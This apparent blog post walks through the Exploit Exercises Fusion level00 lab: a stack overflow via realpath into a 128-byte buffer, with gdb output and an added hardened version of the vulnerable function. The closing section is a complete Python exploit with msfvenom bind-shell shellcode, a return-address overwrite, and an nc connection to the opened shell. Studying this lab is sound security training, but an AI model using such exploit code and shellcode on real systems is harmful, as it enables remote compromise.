
Exploit Exercise Binary Exploitation Fusion level 00

Namaste Friends,

Welcome again to the Bitforestinfo blog. Today's post is going to be an interesting one, because I am going to share my walkthrough of the Exploit Exercises Fusion level 00 challenge.
So, let's start.


This is a simple introduction to get you warmed up. 
The return address is supplied in case your memory needs a jog :)

Hint: Storing your shellcode inside of the fix_path ‘resolved’ buffer might be a bad idea due to character restrictions due to realpath(). Instead, there is plenty of room after the HTTP/1.1 that you can use that will be ideal (and much larger).

Source Code

#include "../common/common.c"    

int fix_path(char *path)
{
  char resolved[128];

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  printf("[debug] buffer is at 0x%08x :-)\n", buffer);

  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);   // canonicalise the requested path in place

  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID); 
  fd = serve_forever(PORT);
  set_io(fd);       // stdin/stdout now refer to the client socket (helper from common.c)

  parse_http_request();
}


Source Code Description

After staring at this code for a few minutes, I understood that it is a server-like program that processes a user-supplied HTTP request. After it starts, it waits for a new connection; when one arrives, the parse_http_request() routine runs and, at the end, calls the fix_path() function. Once I understood the program's behaviour, I started searching for vulnerable code and functions.

Vulnerable codes

Set 1: [Not Sure]

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;  <---- maybe useful for another method???? 

Set 2: [Completely Sure]

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved);

Both sets looked suspicious to me at first sight, but to proceed further I first needed to confirm that the code is actually vulnerable. After a few tests and some gdb analysis, I confirmed that the second set is vulnerable.

The realpath() call is the vulnerable one: it writes the resolved path into the 128-byte resolved buffer without any bound on its length, so a long request path overflows the stack.
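As an added example (not code from the challenge or from the original post), here is the vulnerable shape of fix_path() beside a hardened version that gives realpath(3) the PATH_MAX-byte buffer it documents and refuses to copy a result back unless it fits the caller's buffer; the check functions and their inputs are constructed for this illustration.

```c
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Shape of the challenge's fix_path(): realpath(3) needs a PATH_MAX-byte
 * output buffer, so a long request path overruns the 128-byte stack array. */
int fix_path_vulnerable(char *path)
{
    char resolved[128];
    if (realpath(path, resolved) == NULL) return 1;
    strcpy(path, resolved);   /* second unbounded copy, into the caller's buffer */
    return 0;
}

/* Hardened variant: PATH_MAX scratch space, and the result is copied back
 * only if it fits the caller's path_size bytes. Returns 0 on success,
 * 1 if unresolvable, 2 if it would not fit; path is untouched on failure. */
int fix_path_safe(char *path, size_t path_size)
{
    char resolved[PATH_MAX];
    if (realpath(path, resolved) == NULL) return 1;
    size_t n = strlen(resolved);
    if (n + 1 > path_size) return 2;
    memcpy(path, resolved, n + 1);
    return 0;
}

/* Constructed check 1: "/./" canonicalises to "/" when there is room. */
int check_canonical(void)
{
    char path[PATH_MAX] = "/./";
    return fix_path_safe(path, sizeof path) == 0 && strcmp(path, "/") == 0;
}

/* Constructed check 2: with only 1 byte of room the copy back is refused
 * and the caller's buffer is left exactly as it was. */
int check_no_room(void)
{
    char path[8] = "/./";
    return fix_path_safe(path, 1) == 2 && strcmp(path, "/./") == 0;
}

int main(void)
{
    printf("canonical=%d no_room=%d\n", check_canonical(), check_no_room());
    return 0;
}
```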

Testing Code

fusion@fusion:~$ cat try.c 
#include <stdio.h>
#include <stdlib.h>   /* realpath() */
#include <string.h>

int main(){
 char resolve[150];

 /* the path does not exist, so realpath() fails; print what it left in resolve */
 if (realpath(" HTTP/1.1 aaaaaaaaaaa", resolve) == NULL){
  printf("Fail %s\n", resolve);
 }
 return 0;
}


Analysis of the above testing code is left to the reader, because it is really very simple; you only need to spend a few minutes to understand it completely. Just run it. Hint: buffer-overflow vulnerability.

After a few changes to the testing code, I got the error below.

Gdb Output

Program received signal SIGSEGV, Segmentation fault.
0xcccccccc in ?? ()
(gdb) i r
eax            0x1 1
ecx            0xb7e568d0 -1209702192
edx            0xbffffa45 -1073743291
ebx            0xb7fceff4 -1208160268
esp            0xbffff8e0 0xbffff8e0
ebp            0xcccccccc 0xcccccccc
esi            0xbffffaf9 -1073743111
edi            0x8049f05 134520581
eip            0xcccccccc 0xcccccccc
eflags         0x10246 [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0 0
gs             0x33 51


Now I think solving this challenge is a piece of cake, because we have successfully identified the vulnerability and all of the program's security protections are off. So, here is my exploitation code.


# import modules
import socket
import struct
import os

# target configurations
TARGET_IP = raw_input("[*] Insert Machine Address [Default:] : ") or ''
TARGET_PORT = 20000   # port the level00 service listens on (assumed; check it on your VM)

# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Creating Socket ..."

# Socket File
sf = s.makefile('rb')

# Connect To Target
s.connect((TARGET_IP, TARGET_PORT))

# Read the debug banner that leaks the buffer address,
# e.g. '[debug] buffer is at 0xbffff8f8 :-)\n'
ebp = sf.read(len('[debug] buffer is at 0xbffff8f8 :-)\n'))
print ebp
ebp = ebp[ebp.find('0x'):-5]        # keep only the '0x...' address

print "[+] Generating payload..."
payload = ''
payload+= 'GET '

# generated From Msfvenom
# msfvenom -p linux/x86/shell_bind_tcp
buf =  ""
buf += '\x90'*120            # NOP Sled
buf += '\x31\xC9\x31\xD2\x31\xC0\x31\xDB' # xor [eax, ebx, ecx, edx]
buf += "\xda\xcd\xb8\xbe\xd0\x1b\x82\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x14\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x5c"
buf += "\x25\x2a\x59\x57\x25\x1e\x1e\xc4\xc0\xa3\x29\x0b\xa4"
buf += "\xc2\xe4\x4b\x9e\x54\xa5\x23\x23\x69\x58\xef\x49\x79"
buf += "\x0b\x5f\x07\x98\xc1\x39\x4f\x96\x96\x4c\x2e\x2c\x24"
buf += "\x4a\x01\x4a\x87\xd2\x22\x23\x71\x1f\x24\xd0\x27\xf5"
buf += "\x1a\x8f\x1a\x89\x2c\x56\x5d\xe1\x81\x87\xee\x99\xb5"
buf += "\xf8\x72\x30\x28\x8e\x90\x92\xe7\x19\xb7\xa2\x03\xd7"
buf += "\xb8"
print "[+] Payload ready to dispatch."

# Trying To Find Offset
# 500 Words
# payload+= 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq'

# Offset 139
print "[+] Assemble Payload"
payload+= '\x90'*135        # NOP Sled
payload+= 'b'*4             # saved EBP; a real value would be struct.pack("I", int(ebp, 16))
payload+= struct.pack("I", 0xbffff8dc+10)   # saved return address, points into the NOP sled
payload+= buf
payload+= '\x90'*(1000-(143+len(buf)))     # NOP Sled padding to fill the request
payload+= ' HTTP/1.1\r\n'

# Sending Payload
s.send(payload)
print "[+] Payload Sent"

print "[+] Wait For Response"
# assumed control flow: if the service still prints 'trying to access ...',
# fix_path() returned normally and the exploit did not work; if nothing
# arrives before the timeout, the hijacked process is running the bind shell
s.settimeout(5)
try:
    print [sf.read(len('trying to access %s\n')+10)]
    print "[-] If You Are Reading This Message Then Probably Exploit failed."
    raw_input("[-] Exit. Trying Again..")
except Exception:
    print "[+] Starting Bind TCP Shell."
    print "[+] Use Commands Carefully."
    os.system('nc {} 4444'.format(TARGET_IP))

Yeah! We Won.

Feel free to comment below on the points you appreciated.. Hahaha!
